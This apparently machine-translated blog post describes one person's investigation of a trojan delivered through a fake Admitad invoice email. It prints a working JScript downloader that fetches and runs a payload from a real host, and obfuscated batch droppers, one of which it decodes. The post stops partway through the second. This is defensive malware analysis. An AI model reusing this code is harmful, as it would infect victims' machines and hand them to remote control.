Geekly Articles each Day
📜 ⬆️ ⬇️

Modern Trojan Horse: the story of a single investigation


Hello!

Today I will tell you about a Trojan horse that wandered into the garden of my very good friend, how I drove an intruder, what was inside him and what lessons I learned from all this.

If you're interested - welcome under the cat!

Part one: the beginning


It all started about three weeks ago on a warm spring day when my very good friend called me and told me the following story: a few minutes ago he received an email from Admitad, with which he had a business relationship. The letter was this content:
')
Admitad : 23.03.16 . . . 25.03.16 () AD. AD . Admitad Support.

The sender was Admitad Support. And, of course, the RAR archive with the XLS file inside was attached to the letter.

He unpacked the archive, of course, launched the XLS file and (ta-daaaa!) Allowed launching macros, because Excel instead of the expected table displayed a lengthy interpretation of some macros (the devil knows what it is, and what word something stupid). Well, after he saw some invoice for paying for watching the video, the insight finally came that he was cruelly deceived. He realized that he had just caught some kind of infection and asked me to take a look at the computer - to get rid of it.

I listened to the story, scolded him a little, sympathized with him and asked to start Timviewer - because it was a bit lazy to drive through the whole city.

Part Two: Initial Examination


Having connected to the computer via Timviewer, I began the survey.

First of all, the attachment was sent to Virustotal: the result is 0/56. Svezhak - I thought.
Then I began to look for fresh files on the disk. Those were found in the temp folder: there, among other things, were two executable files: run.exe and stream.js.

Here is how stream.js looked from inside
 (function (Global){ function CreateObject(ProgId) { return new ActiveXObject(ProgId); } var FSO = fso = CreateObject("Scripting.FileSystemObject"); var WshShell = CreateObject("WScript.Shell"); function tmp() { var uyeifds = new ActiveXObject("Shell.Application"); return uyeifds; } function isFile(Path) { Path = WshShell.ExpandEnvironmentStrings(Path); return fso.FileExists(Path); } function shl(rto) { tmp().ShellExecute(rto,"","","open","0"); } function DeleteFile(Path) { if (/Array/i.test(Path.constructor+"")) { for (var i=0, l=Path.length;i<l;i++) DeleteFile(Path[i]); return; } Path = WshShell.ExpandEnvironmentStrings(Path); try { if (isFile(Path)) FSO.GetFile(Path).Delete(true); } catch (e) {} } function DownloadFileFromURL(Url, FileDest) { var msx = "Msxml2"; if (!FileDest || !Url) return null; var ge = "GE"; FileDest = WshShell.ExpandEnvironmentStrings(FileDest); msx = msx + ".XMLHTTP"; DeleteFile(FileDest); var oXMLHTTP = WScript.CreateObject(msx); oXMLHTTP.open (ge + "T", Url, false); oXMLHTTP.send(null); var oADOStream = CreateObject("ADO" + "DB.Stream"); with (oADOStream){ Mode = 3; Type = 1; Open() Write (oXMLHTTP.responseBody); SaveToFile(FileDest, 2); Close(); return FileDest; } } var tor1="%TMP%\\run.e"; var tor2="xe"; try { FSO.GetFile("\\\\WORKOUT\\..hj"); } catch (e) { var Url="http://s2.zalivalka.ru/download/344314/231.jpg"; DownloadFileFromURL(Url,tor1+tor2); shl(WshShell.ExpandEnvironmentStrings(tor1+tor2)); } })(this)


A quick inspection of the patient made it clear that this is just a bootloader that loads the file https: //s2.zalivalka.ru/download/344314/231.jpg, renames it to run.exe and starts. Here in the URL I specifically replaced the Latin 'p' with the Russian 'p' in the abbreviation of http - so that the URL does not turn into a link. Virustotal did not respond modestly to run.exe either.

Okay - I thought - and continued to search for fresh files in the computer. Soon the folder "% appdata% \ MicrocoftUpdate \" was discovered with a bunch of files inside. Yes, yes, just like that - Micro c oft - through 'c'. I don’t know if this mistake was specifically made or not, but it greatly facilitated the further search for changes made to the registry. There was only one exe-shnik in this folder: ctfmon.exe. If someone forgot, then I remind you that it was once called the keyboard layout switch in Windows XP.

To begin with, I decided to rename this folder - so that a virus that I have not yet discovered could not use the files from it. However, the attempt to rename the folder failed. But is not cftmon.exe started from it and does not allow me to do this? - I thought. Opened the task manager - well, it is - here it is, my dear. He terminated it and the folder was renamed after that.

Then I sent ctfmon.exe to Virustotal. The result was not very scary - something around 5/56, and these five said that it was not a virus, but the so-called RiskWare is legal software used for remote computer control. Then I returned to the temp folder and at that moment I realized that I had made a serious mistake: the folder was empty. In parallel with me, someone rummaged in the computer, gathered everything he needed, carefully tidied up after himself and left.

Damn, damn, damn! My laziness gave the enemy the opportunity to do their dirty deed. I dialed the phone of a friend, asked him to turn off the computer, took the laptop and went to his house.

Part Three: Preparing the Horse


For vivisection, a virtual machine was installed on the laptop, on which Windows 7, Microsoft Office, Process Monitor and WireShark were installed. Having started the virus, I waited a bit - when it finishes all its affairs and launches ctfmon.exe, after which it terminated ctfmon and began to study the collected logs.

From the Process Monitor log, it soon became clear that run.exe is a self-extracting archive. For verification, I opened it as an archive: well, it is - there are two files inside: t10.bat and poi.exe. Having pulled t10.bat from the archive, I decided to study it: but it was not there! This I have not seen before.

Inside t10.bat was this.
 set iDVrlM=set %iDVrlM% pGJV= %iDVrlM%%pGJV%lVOMlhijX== %iDVrlM%%pGJV%GcayqJj%lVOMlhijX%{ %iDVrlM%%pGJV%DysQd%lVOMlhijX%i %iDVrlM%%pGJV%zSdh%lVOMlhijX%0 %iDVrlM%%pGJV%IyEwFH%lVOMlhijX%W %iDVrlM%%pGJV%wgHafh%lVOMlhijX%d %iDVrlM%%pGJV%EyadtMp%lVOMlhijX%f %iDVrlM%%pGJV%ipCNKA%lVOMlhijX%5 %iDVrlM%%pGJV%QYFaxm%lVOMlhijX%* %iDVrlM%%pGJV%VTlcnvcrw%lVOMlhijX%] %iDVrlM%%pGJV%rirX%lVOMlhijX%M %iDVrlM%%pGJV%iKwg%lVOMlhijX%_ %iDVrlM%%pGJV%RASAyUS%lVOMlhijX%? %iDVrlM%%pGJV%heoAiQ%lVOMlhijX%g %iDVrlM%%pGJV%uMCoFRy%lVOMlhijX%/ %iDVrlM%%pGJV%hxUEB%lVOMlhijX%$ %iDVrlM%%pGJV%JzIoznwCO%lVOMlhijX%v %iDVrlM%%pGJV%dbqUTP%lVOMlhijX%! %iDVrlM%%pGJV%KepbD%lVOMlhijX%# %iDVrlM%%pGJV%LXEX%lVOMlhijX%s %iDVrlM%%pGJV%LpfBjM%lVOMlhijX%@ %iDVrlM%%pGJV%UahIVhihw%lVOMlhijX%I %iDVrlM%%pGJV%uCYMaI%lVOMlhijX%- %iDVrlM%%pGJV%vmit%lVOMlhijX%D %iDVrlM%%pGJV%MCWbFLDjD%lVOMlhijX%E %iDVrlM%%pGJV%knPXvDj%lVOMlhijX%7 %iDVrlM%%pGJV%YEhMVMG%lVOMlhijX%; %iDVrlM%%pGJV%wTULRTl%lVOMlhijX%1 %iDVrlM%%pGJV%Jrjse%lVOMlhijX%q %iDVrlM%%pGJV%NDAI%lVOMlhijX%x %iDVrlM%%pGJV%lUEuKBc%lVOMlhijX%U %iDVrlM%%pGJV%HriWu%lVOMlhijX%8 %iDVrlM%%pGJV%VMaInwUi%lVOMlhijX%w %iDVrlM%%pGJV%KrGSTTdN%lVOMlhijX%9 %iDVrlM%%pGJV%XokcwjROA%lVOMlhijX%\ %iDVrlM%%pGJV%DdlJvxpBT%lVOMlhijX%y %iDVrlM%%pGJV%LVicuKuUF%lVOMlhijX%F %iDVrlM%%pGJV%hnydIrGM%lVOMlhijX%B %iDVrlM%%pGJV%RXvHWsxrp%lVOMlhijX%4 %iDVrlM%%pGJV%dIYiPoN%lVOMlhijX%} %iDVrlM%%pGJV%ukXME%lVOMlhijX%+ %iDVrlM%%pGJV%gWSgSMYA%lVOMlhijX%T %iDVrlM%%pGJV%IYBhtEnG%lVOMlhijX%e %iDVrlM%%pGJV%yBLVgYi%lVOMlhijX%N %iDVrlM%%pGJV%YYRSUQ%lVOMlhijX%z %iDVrlM%%pGJV%UbHph%lVOMlhijX%P %iDVrlM%%pGJV%fTsricQFz%lVOMlhijX%k %iDVrlM%%pGJV%gkNnIB%lVOMlhijX%2 %iDVrlM%%pGJV%ztzbgDRjB%lVOMlhijX%j %iDVrlM%%pGJV%TMmw%lVOMlhijX%n %iDVrlM%%pGJV%bFpwLXPA%lVOMlhijX%p %iDVrlM%%pGJV%UjcGDFmD%lVOMlhijX%a %iDVrlM%%pGJV%ydOvR%lVOMlhijX%Y %iDVrlM%%pGJV%cpwfdcVIC%lVOMlhijX%" %iDVrlM%%pGJV%sIMODTo%lVOMlhijX%) %iDVrlM%%pGJV%reSQtdOC%lVOMlhijX%[ %iDVrlM%%pGJV%LnzWsIe%lVOMlhijX%6 %iDVrlM%%pGJV%gJBfV%lVOMlhijX%L %iDVrlM%%pGJV%XmuWmdma%lVOMlhijX%. %iDVrlM%%pGJV%sAGBcVq%lVOMlhijX%h %iDVrlM%%pGJV%GmXLXKBWD%lVOMlhijX%O %iDVrlM%%pGJV%CwxeyCrE%lVOMlhijX%t %iDVrlM%%pGJV%mmTzf%lVOMlhijX%l %iDVrlM%%pGJV%aTVdF%lVOMlhijX%r %iDVrlM%%pGJV%ILOSfqlmf%lVOMlhijX%Z %iDVrlM%%pGJV%WsGmIpaah%lVOMlhijX%R %iDVrlM%%pGJV%yJgKHTGjV%lVOMlhijX%C %iDVrlM%%pGJV%TPqwMwH%lVOMlhijX%Q %iDVrlM%%pGJV%hJJAtBUgr%lVOMlhijX%H %iDVrlM%%pGJV%hHpkv%lVOMlhijX%m %iDVrlM%%pGJV%wlLk%lVOMlhijX%b %iDVrlM%%pGJV%hlbFW%lVOMlhijX%, %iDVrlM%%pGJV%cGSDDWyd%lVOMlhijX%X %iDVrlM%%pGJV%phqNn%lVOMlhijX%J %iDVrlM%%pGJV%fPbur%lVOMlhijX%S %iDVrlM%%pGJV%eOigMGv%lVOMlhijX%u %iDVrlM%%pGJV%CbAKNK%lVOMlhijX%K %iDVrlM%%pGJV%IWaff%lVOMlhijX%3 %iDVrlM%%pGJV%sccH%lVOMlhijX%c %iDVrlM%%pGJV%PoATNXt%lVOMlhijX%o %iDVrlM%%pGJV%tdMSJfDrF%lVOMlhijX%V %iDVrlM%%pGJV%ITymyoQK%lVOMlhijX%: %iDVrlM%%pGJV%eaOFc%lVOMlhijX%G %iDVrlM%%pGJV%Bucwql%lVOMlhijX%A %iDVrlM%%pGJV%lcDFKx%lVOMlhijX%( %LpfBjM%%MCWbFLDjD%%sccH%%sAGBcVq%%PoATNXt%%pGJV%%GmXLXKBWD%%EyadtMp%%EyadtMp% %bFpwLXPA%%DysQd%%TMmw%%heoAiQ%%pGJV%%uCYMaI%%TMmw%%pGJV%%gkNnIB%%pGJV%%heoAiQ%%PoATNXt%%PoATNXt%%heoAiQ%%mmTzf%%IYBhtEnG%%XmuWmdma%%sccH%%PoATNXt%%hHpkv%|%LVicuKuUF%%DysQd%%TMmw%%wgHafh%%pGJV%%uMCoFRy%%UahIVhihw%%pGJV%%cpwfdcVIC%%gWSgSMYA%%gWSgSMYA%%gJBfV%%lVOMlhijX%%cpwfdcVIC%||%heoAiQ%%PoATNXt%%CwxeyCrE%%PoATNXt%%pGJV%%TMmw%%IYBhtEnG%%NDAI%%CwxeyCrE%%pGJV% %CwxeyCrE%%UjcGDFmD%%LXEX%%fTsricQFz%%fTsricQFz%%DysQd%%mmTzf%%mmTzf%%pGJV%%uMCoFRy%%EyadtMp%%pGJV%%uMCoFRy%%DysQd%%hHpkv%%pGJV%%sccH%%CwxeyCrE%%EyadtMp%%hHpkv%%PoATNXt%%TMmw%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %CwxeyCrE%%UjcGDFmD%%LXEX%%fTsricQFz%%fTsricQFz%%DysQd%%mmTzf%%mmTzf%%pGJV%%uMCoFRy%%EyadtMp%%pGJV%%uMCoFRy%%DysQd%%hHpkv%%pGJV%%sccH%%CwxeyCrE%%EyadtMp%%hHpkv%%PoATNXt%%TMmw%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %CwxeyCrE%%UjcGDFmD%%LXEX%%fTsricQFz%%fTsricQFz%%DysQd%%mmTzf%%mmTzf%%pGJV%%uMCoFRy%%EyadtMp%%pGJV%%uMCoFRy%%DysQd%%hHpkv%%pGJV%%sccH%%CwxeyCrE%%EyadtMp%%hHpkv%%PoATNXt%%TMmw%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %CwxeyCrE%%UjcGDFmD%%LXEX%%fTsricQFz%%fTsricQFz%%DysQd%%mmTzf%%mmTzf%%pGJV%%uMCoFRy%%EyadtMp%%pGJV%%uMCoFRy%%DysQd%%hHpkv%%pGJV%%sccH%%CwxeyCrE%%EyadtMp%%hHpkv%%PoATNXt%%TMmw%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %CwxeyCrE%%UjcGDFmD%%LXEX%%fTsricQFz%%fTsricQFz%%DysQd%%mmTzf%%mmTzf%%pGJV%%uMCoFRy%%EyadtMp%%pGJV%%uMCoFRy%%DysQd%%hHpkv%%pGJV%%sccH%%CwxeyCrE%%EyadtMp%%hHpkv%%PoATNXt%%TMmw%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %CwxeyCrE%%UjcGDFmD%%LXEX%%fTsricQFz%%fTsricQFz%%DysQd%%mmTzf%%mmTzf%%pGJV%%uMCoFRy%%EyadtMp%%pGJV%%uMCoFRy%%DysQd%%hHpkv%%pGJV%%sccH%%CwxeyCrE%%EyadtMp%%hHpkv%%PoATNXt%%TMmw%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %CwxeyCrE%%UjcGDFmD%%LXEX%%fTsricQFz%%fTsricQFz%%DysQd%%mmTzf%%mmTzf%%pGJV%%uMCoFRy%%EyadtMp%%pGJV%%uMCoFRy%%DysQd%%hHpkv%%pGJV%%sccH%%CwxeyCrE%%EyadtMp%%hHpkv%%PoATNXt%%TMmw%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG%%pGJV%%uMCoFRy%%JzIoznwCO%%IYBhtEnG%%aTVdF%%DdlJvxpBT%%LXEX%%DysQd%%mmTzf%%IYBhtEnG%%TMmw%%CwxeyCrE%%pGJV%%uMCoFRy%%UbHph%%UjcGDFmD%%LXEX%%LXEX%%VMaInwUi%%PoATNXt%%aTVdF%%wgHafh%%lVOMlhijX%%IWaff%%RXvHWsxrp%%ipCNKA%%RXvHWsxrp%%LnzWsIe%%ipCNKA%%wTULRTl%%gkNnIB%%gkNnIB%%IWaff%%RXvHWsxrp%%ipCNKA% %bFpwLXPA%%DysQd%%TMmw%%heoAiQ%%pGJV%%mmTzf%%PoATNXt%%sccH%%UjcGDFmD%%mmTzf%%sAGBcVq%%PoATNXt%%LXEX%%CwxeyCrE%%pGJV%%uCYMaI%%wTULRTl%%zSdh% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%0%pGJV%>%pGJV%%TMmw%%eOigMGv%%mmTzf% %heoAiQ%%PoATNXt%%CwxeyCrE%%PoATNXt%%pGJV%%wTULRTl% :next %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%0%pGJV%>%pGJV%%TMmw%%eOigMGv%%mmTzf% :1 %MCWbFLDjD%%NDAI%%DysQd%%CwxeyCrE%%pGJV%


It looked like some kind of encryption from Alex Eustace. I had to understand.

The first line went:
 set iDVrlM=set

It is clear that in the text all the lines '% iDVrlM%' need to be replaced by 'set'. No sooner said than done:
 set iDVrlM=set set pGJV= set%pGJV%lVOMlhijX== set%pGJV%GcayqJj%lVOMlhijX%{ ...   :   .

Now the second line began to look human. After the equal sign there is a space in it (here it is not visible on the code). It is clear that now you need to replace all the lines '% pGJV%' with a space:
 set iDVrlM=set set pGJV= set lVOMlhijX== set GcayqJj%lVOMlhijX%{ set DysQd%lVOMlhijX%i ...   :     .

Go ahead. The third line tells us that we need to replace all the lines '% lVOMlhijX%' with an equal sign:

Replacement result
 set iDVrlM=set set pGJV= set lVOMlhijX== set GcayqJj={ set DysQd=i set zSdh=0 set IyEwFH=W set wgHafh=d set EyadtMp=f set ipCNKA=5 set QYFaxm=* set VTlcnvcrw=] set rirX=M set iKwg=_ set RASAyUS=? set heoAiQ=g set uMCoFRy=/ set hxUEB=$ set JzIoznwCO=v set dbqUTP=! set KepbD=# set LXEX=s set LpfBjM=@ set UahIVhihw=I set uCYMaI=- set vmit=D set MCWbFLDjD=E set knPXvDj=7 set YEhMVMG=; set wTULRTl=1 set Jrjse=q set NDAI=x set lUEuKBc=U set HriWu=8 set VMaInwUi=w set KrGSTTdN=9 set XokcwjROA=\ set DdlJvxpBT=y set LVicuKuUF=F set hnydIrGM=B set RXvHWsxrp=4 set dIYiPoN=} set ukXME=+ set gWSgSMYA=T set IYBhtEnG=e set yBLVgYi=N set YYRSUQ=z set UbHph=P set fTsricQFz=k set gkNnIB=2 set ztzbgDRjB=j set TMmw=n set bFpwLXPA=p set UjcGDFmD=a set ydOvR=Y set cpwfdcVIC=" set sIMODTo=) set reSQtdOC=[ set LnzWsIe=6 set gJBfV=L set XmuWmdma=. set sAGBcVq=h set GmXLXKBWD=O set CwxeyCrE=t set mmTzf=l set aTVdF=r set ILOSfqlmf=Z set WsGmIpaah=R set yJgKHTGjV=C set TPqwMwH=Q set hJJAtBUgr=H set hHpkv=m set wlLk=b set hlbFW=, set cGSDDWyd=X set phqNn=J set fPbur=S set eOigMGv=u set CbAKNK=K set IWaff=3 set sccH=c set PoATNXt=o set tdMSJfDrF=V set ITymyoQK=: set eaOFc=G set Bucwql=A set lcDFKx=( ...


Well, now the whole replacement alphabet has opened. Having spent 15 more minutes, with the help of text and HEX editors, I replaced all the%% lines with the corresponding characters and as a result I got this bat-file:
 @Echo Off ping -n 2 google.com|Find /I "TTL="||goto next taskkill /f /im ctfmon.exe taskkill /f /im ctfmon.exe taskkill /f /im ctfmon.exe taskkill /f /im ctfmon.exe taskkill /f /im ctfmon.exe taskkill /f /im ctfmon.exe taskkill /f /im ctfmon.exe poi.exe /verysilent /Password=345465122345 ping localhost -10 del %0 > nul goto 1 :next del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del %0 > nul :1 Exit

The essence of the bat-file turned out to be very straightforward: with the help of ping google.com, connection with the Internet is checked. If there is no connection, poi.exe is deleted along with the bat file itself and everything ends there. If there is a connection, the ctfmon.exe process is first terminated, then poi.exe is launched with the “verysilent” and “Password = 345465122345” parameters, and then the bat file is self-destroyed.

Two points remained unclear to me - what was supposed to be done with the “ping localhost -10” command and why these multiple repetitions of the taskkill and del operations?

Anyway. After that, I began to study poi.exe. An attempt to open it as an archive failed. However, launching a program with parameters is somewhat unusual behavior for a virus (as it seemed to me). Therefore, I turned to the well of knowledge called the Internet and immediately found what I’m looking for using the keywords “verysilent” and “Password”: Inno Setup is a free installer for Windows programs .

Once someone did the archiver, someone else must do the unpacker - I thought - and continued the search. The query "inno setup decompiler" immediately gave the desired result . Fine! I downloaded it and launched:
 d:\virus\poi>innounp -x -p345465122345 poi.exe ; Version detected: 5500 (Unicode) #0 {app}\avicap32.dll Reading slice d:\virus\poi\poi.exe #1 {app}\ctfmon.exe #2 {app}\test.bat #3 {app}\test.vbs #4 install_script.iss

The unpacker quickly completed his work and I received several files for further study. I started with the install_script.iss file. The only noteworthy section was the [Run] section:
 Filename: "{app}\test.vbs"; Description: "{cm:LaunchProgram,Test}"; MinVersion: 0.0,5.0; Flags: shellexec postinstall nowait

From it, it became clear that the VB script test.vbs is launched first:
 On Error Resume Next Set WshShell = CreateObject("WScript.Shell") WshShell.Run "test.bat",0,true Set FSO = CreateObject("Scripting.FileSystemObject") FSO.DeleteFile WScript.ScriptFullName, 0

The script is also simple: runs test.bat and self-destructs.

Now look at test.bat:

Ugh, damn it, now Eustace telegraphs Alex!
 set lpQmnLQ=set %lpQmnLQ% RCRUDqE= %lpQmnLQ%%RCRUDqE%yFcQKpJyG== %lpQmnLQ%%RCRUDqE%aaLTgkA%yFcQKpJyG%# %lpQmnLQ%%RCRUDqE%kOXeOOyR%yFcQKpJyG%@ %lpQmnLQ%%RCRUDqE%toTUt%yFcQKpJyG%o %lpQmnLQ%%RCRUDqE%mRMLJkAp%yFcQKpJyG%/ %lpQmnLQ%%RCRUDqE%IHrQ%yFcQKpJyG%; %lpQmnLQ%%RCRUDqE%immQQhH%yFcQKpJyG%c %lpQmnLQ%%RCRUDqE%ksBw%yFcQKpJyG%Q %lpQmnLQ%%RCRUDqE%qlLeeJ%yFcQKpJyG%f %lpQmnLQ%%RCRUDqE%QvBGN%yFcQKpJyG%E %lpQmnLQ%%RCRUDqE%SAKEFniaY%yFcQKpJyG%G %lpQmnLQ%%RCRUDqE%hmixayLOL%yFcQKpJyG%M %lpQmnLQ%%RCRUDqE%oaLFfs%yFcQKpJyG%} %lpQmnLQ%%RCRUDqE%NjHP%yFcQKpJyG%K %lpQmnLQ%%RCRUDqE%MuOksUDd%yFcQKpJyG%u %lpQmnLQ%%RCRUDqE%upeuMhJ%yFcQKpJyG%H %lpQmnLQ%%RCRUDqE%mOMhgb%yFcQKpJyG%y %lpQmnLQ%%RCRUDqE%NSQCAVz%yFcQKpJyG%: %lpQmnLQ%%RCRUDqE%dxmCkR%yFcQKpJyG%[ %lpQmnLQ%%RCRUDqE%ScSLQo%yFcQKpJyG%l %lpQmnLQ%%RCRUDqE%iGpKA%yFcQKpJyG%0 %lpQmnLQ%%RCRUDqE%MKbjyO%yFcQKpJyG%R %lpQmnLQ%%RCRUDqE%tCgoVQ%yFcQKpJyG%+ %lpQmnLQ%%RCRUDqE%KbJyRFMVu%yFcQKpJyG%( %lpQmnLQ%%RCRUDqE%yOmTK%yFcQKpJyG%B %lpQmnLQ%%RCRUDqE%DGHR%yFcQKpJyG%8 %lpQmnLQ%%RCRUDqE%LKQhkKSem%yFcQKpJyG%s %lpQmnLQ%%RCRUDqE%UtIjaUOl%yFcQKpJyG%X %lpQmnLQ%%RCRUDqE%KYddI%yFcQKpJyG%A %lpQmnLQ%%RCRUDqE%TMuVQ%yFcQKpJyG%4 %lpQmnLQ%%RCRUDqE%dAMOY%yFcQKpJyG%) %lpQmnLQ%%RCRUDqE%vpVg%yFcQKpJyG%_ %lpQmnLQ%%RCRUDqE%aeVO%yFcQKpJyG%J %lpQmnLQ%%RCRUDqE%YrtVU%yFcQKpJyG%b %lpQmnLQ%%RCRUDqE%vANLWtdW%yFcQKpJyG%d %lpQmnLQ%%RCRUDqE%tNqAVXbz%yFcQKpJyG%m %lpQmnLQ%%RCRUDqE%LkyqXKNYc%yFcQKpJyG%e %lpQmnLQ%%RCRUDqE%ltuAgKR%yFcQKpJyG%w %lpQmnLQ%%RCRUDqE%GNbpPXWvQ%yFcQKpJyG%a %lpQmnLQ%%RCRUDqE%QBmzz%yFcQKpJyG%i %lpQmnLQ%%RCRUDqE%pNywcj%yFcQKpJyG%C %lpQmnLQ%%RCRUDqE%sQrHzBN%yFcQKpJyG%v %lpQmnLQ%%RCRUDqE%DCbQQGfkL%yFcQKpJyG%2 %lpQmnLQ%%RCRUDqE%zUwuD%yFcQKpJyG%z %lpQmnLQ%%RCRUDqE%abWkRpti%yFcQKpJyG%S %lpQmnLQ%%RCRUDqE%mPVfEbE%yFcQKpJyG%r %lpQmnLQ%%RCRUDqE%sIluXDQS%yFcQKpJyG%7 %lpQmnLQ%%RCRUDqE%OWatTKvD%yFcQKpJyG%x %lpQmnLQ%%RCRUDqE%krFh%yFcQKpJyG%5 %lpQmnLQ%%RCRUDqE%UdGiq%yFcQKpJyG%T %lpQmnLQ%%RCRUDqE%kHci%yFcQKpJyG%] %lpQmnLQ%%RCRUDqE%pVCdLFa%yFcQKpJyG%, %lpQmnLQ%%RCRUDqE%nmvE%yFcQKpJyG%j %lpQmnLQ%%RCRUDqE%zHzGVcDcY%yFcQKpJyG%k %lpQmnLQ%%RCRUDqE%GAJoRj%yFcQKpJyG%n %lpQmnLQ%%RCRUDqE%DNmdQ%yFcQKpJyG%q %lpQmnLQ%%RCRUDqE%oAndDQK%yFcQKpJyG%L %lpQmnLQ%%RCRUDqE%lSBY%yFcQKpJyG%O %lpQmnLQ%%RCRUDqE%JcERxC%yFcQKpJyG%h %lpQmnLQ%%RCRUDqE%pcEihxAuJ%yFcQKpJyG%I %lpQmnLQ%%RCRUDqE%shHyBbWt%yFcQKpJyG%. %lpQmnLQ%%RCRUDqE%KAFkG%yFcQKpJyG%- %lpQmnLQ%%RCRUDqE%AdQY%yFcQKpJyG%t %lpQmnLQ%%RCRUDqE%pIxi%yFcQKpJyG%Y %lpQmnLQ%%RCRUDqE%TKaBbO%yFcQKpJyG%1 %lpQmnLQ%%RCRUDqE%pCQWd%yFcQKpJyG%F %lpQmnLQ%%RCRUDqE%gEuKD%yFcQKpJyG%V %lpQmnLQ%%RCRUDqE%ulmeh%yFcQKpJyG%9 %lpQmnLQ%%RCRUDqE%nFjJmCQ%yFcQKpJyG%N %lpQmnLQ%%RCRUDqE%hdvdM%yFcQKpJyG%W %lpQmnLQ%%RCRUDqE%jgpoj%yFcQKpJyG%" %lpQmnLQ%%RCRUDqE%xMhHMK%yFcQKpJyG%6 %lpQmnLQ%%RCRUDqE%aOOInC%yFcQKpJyG%3 %lpQmnLQ%%RCRUDqE%GLznBQ%yFcQKpJyG%U %lpQmnLQ%%RCRUDqE%oFHOxG%yFcQKpJyG%g %lpQmnLQ%%RCRUDqE%KudP%yFcQKpJyG%{ %lpQmnLQ%%RCRUDqE%QSrCDDA%yFcQKpJyG%$ %lpQmnLQ%%RCRUDqE%XLAkzKtxq%yFcQKpJyG%* %lpQmnLQ%%RCRUDqE%opQB%yFcQKpJyG%Z 